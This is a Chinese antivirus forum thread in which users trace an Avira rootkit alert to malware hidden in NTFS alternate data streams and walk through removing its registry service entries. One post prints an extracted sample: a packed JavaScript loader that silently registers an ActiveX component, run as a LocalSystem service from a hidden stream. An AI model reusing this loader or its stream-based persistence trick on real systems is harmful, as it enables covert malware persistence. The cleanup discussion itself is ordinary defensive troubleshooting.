查看: 5671|回复: 15
收起左侧

[讨论] 小红伞报的奇怪文件

[复制链接]
xiaojinglf
发表于 2014-3-29 17:54:05 | 显示全部楼层 |阅读模式
本帖最后由 xiaojinglf 于 2014-4-5 19:57 编辑

2014英文版互联网套装3.29开始报奇怪

win7 64位系统

Virus or unwanted program 'TR/Rootkit.Gen [trojan]'
detected in file 'C:\Windows\Media\Desktop.ini:xinstaller.sys.
Action performed: Allow access

但是小红伞默认缺允许了访问


检查C:\Windows\Media\Desktop.ini文件是有的。

Desktop.ini:xinstaller.sys未找到

用AlternateStreamView扫描后发现。可以删除。但是此时千万不要先删除。
首先到注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\heng_pro,删除heng_pro这个项。重启计算机。然后在AlternateStreamView扫描并删除这个数据流

抓到的:


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
xiaojinglf
 楼主| 发表于 2014-3-30 19:36:56 | 显示全部楼层
本帖最后由 xiaojinglf 于 2014-4-3 09:38 编辑

desktop.ini文件内是没有发现xinstaller.sys引用,系统中也没有这个xinstaller.sys
holdings
发表于 2014-4-1 20:43:40 | 显示全部楼层
我的事server 2012 r2 和win8.1同样内核 npe也扫出来这个了, 另C:\Windows\media 下面有个qq.txt,里面有两行字幕和数字混乱排列的字符
qftest
发表于 2014-4-1 21:53:28 | 显示全部楼层
xiaojinglf 发表于 2014-3-30 19:36
文件内也没有发现xinstaller.sys引用,系统中也没有这个xinstaller.sys

文本内容貌似正常
建议用PCHunter定位到这个文件,看文件名是否Desktop.ini:xinstaller.sys字样(正常应该没有冒号后面东西的),如果有冒号后面的字样就说明这是一个被隐藏的NTFS数据流,按comodo的说法这是一个典型的病毒行为,可以利用PCHunter的复制功能将该样本复制保存后上传让大家鉴定下
xiaojinglf
 楼主| 发表于 2014-4-2 09:11:11 | 显示全部楼层
检查到注册表服务项目:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\heng_pro]
"Type"=dword:00000001
"Start"=dword:00000001
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,\
  44,00,4f,00,57,00,53,00,5c,00,4d,00,65,00,64,00,69,00,61,00,5c,00,44,00,65,\
  00,73,00,6b,00,74,00,6f,00,70,00,2e,00,69,00,6e,00,69,00,3a,00,78,00,69,00,\
  6e,00,73,00,74,00,61,00,6c,00,6c,00,65,00,72,00,2e,00,73,00,79,00,73,00,00,\
  00
"DisplayName"="heng_pro"
"WOW64"=dword:00000001
qftest
发表于 2014-4-2 11:37:21 | 显示全部楼层
xiaojinglf 发表于 2014-4-2 09:11
检查到注册表服务项目:

Windows Registry Editor Version 5.00

果然是heng_pro,昨天我在样本区找到一个样本http://bbs.kafan.cn/thread-1601997-1-1.html,用记事本打开后就发现内容与这个目录有关,可能你电脑里的就是这货
又是Rootkit又是SYS,建议使用gmer全扫一次或直接尝试PE 360急救箱

评分

参与人数 1经验 +5 收起 理由
心跳回忆 + 5 感谢解答: )

查看全部评分

xiaojinglf
 楼主| 发表于 2014-4-2 12:57:03 | 显示全部楼层
本帖最后由 xiaojinglf 于 2014-4-2 22:49 编辑

我查出xinstaller.exe及xinstaller.dll是迅雷看看高清组件。
因此怀疑xinstaller.sys与迅雷是一家的
最近安装了迅雷极速版

xinstaller.sys在我的机器估计被杀。
但这个注册表引用的驱动不能直接删除注册表。否则重启会在输入登录密码后卡很久。然后进入桌面报错。

我采取如下措施解决:
首先卸载迅雷极速版
然后找到驱动将其设置为禁用
重启计算机后。删除这个注册表项。
再次重启未见异常
xiaojinglf
 楼主| 发表于 2014-4-2 13:57:36 | 显示全部楼层
随后再次检查发现还有另外一个服务。这个服务对应的到 C:\WINDOWS\system32\wbem\Desktop.ini:wmic.js。
服务处于禁用状态。
同样删除注册表后无异常
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\aaobgeie]
"Type"=dword:00000010
"Start"=dword:00000004
"ErrorControl"=dword:00000001
"ImagePath"=C:\WINDOWS\System32\WScript.exe C:\WINDOWS\system32\wbem\Desktop.ini:wmic.js
"DisplayName"="aaobgeie"
"WOW64"=dword:00000001
"ObjectName"="LocalSystem"
"Description"="aaobgeie"
xiaojinglf
 楼主| 发表于 2014-4-3 08:03:16 | 显示全部楼层
本帖最后由 xiaojinglf 于 2014-4-3 09:33 编辑

导出的wmic.js
文件内容:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5 a=3 4("2.0");a.1("7 9.b /8");6 a;',12,12,'Shell|run|Wscript|new|ActiveXObject|var|delete|regsvr32|s|COM_ActiveX||ocx'.split('|'),0,{}))

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qftest
发表于 2014-4-4 10:15:26 | 显示全部楼层
xiaojinglf 发表于 2014-4-3 08:03
导出的wmic.js
文件内容:

晓月大大你不使用回复功能我收不到消息提醒呀,还好我还记得这帖子的事
xinstaller.sys是不是迅雷看看的我判断不了,只是奇怪一个看视频的东西有什么必要Rootkit,这种高端货色建议大大还是远离较好
题外话,有机会与晓月大大交流比较兴奋啊,几年前最早用的小红伞就是大大的汉化版和工具箱,还学习过大大的使用教程
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-24 16:05 , Processed in 0.133253 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表